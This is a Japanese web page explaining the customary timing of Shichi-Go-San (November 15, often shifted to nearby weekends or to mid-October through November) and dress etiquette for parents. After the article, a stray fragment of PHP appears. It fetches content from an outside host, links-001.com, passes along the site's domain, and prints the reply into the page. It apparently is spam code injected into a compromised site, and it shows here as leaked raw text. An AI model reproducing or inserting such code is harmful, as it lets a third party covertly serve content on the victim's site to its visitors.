前へ
次へ

七五三の時期についての説明

お子様が誕生し、大きく成長する過程のお祝いの一つに七五三があります。11月になると神社周辺には、たくさんの千歳飴の袋を持ったオシャレをしている子供達がいます。そんな七五三の時期はいつなのでしょうか。11月15日とされています。祝日ではないため、両親の仕事の関係などでその日に必ずできるというわけではないため、その前後の土日に行うケースが多いです。しかし、最近では、その時期、神社が混むため10月中旬から11月末までに行うケースが増えています。また、子供のかわいい姿を記念に撮影するために写真館もこの時期混むため、ずらして撮影するケースも増えており、写真館では4月頃から前撮りのキャンペーンを始める所もあります。七五三で着物を着ようか、スーツを着ようか、悩まれている方、多いのではないのでしょうか。七五三での親の服装のルールを解説したいと思います。七五三は子供の成長を祝い、神様に子供のこれからの成長を見守って下さるようお願いするお祝いです。神様に参拝するのでカジュアルな服装は避けた方が良いでしょう。服装を選ぶ際、最も注意したいのは、子どもが主役であること。子どもより目立ってしまう派手な服装は避けましょう。そして、子どもより格下のものを着るよう気を付けたいですね。子どもが洋装の場合は、親も洋装を選びましょう。あまりにフォーマル過ぎると子どもよりも格上になってしまうので、ビジネススーツやワンピースにアクセサリで華やかさを出すくらいがちょうどよいと思います。あくまでも子どもが主役であることを第一に考えておきましょう。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top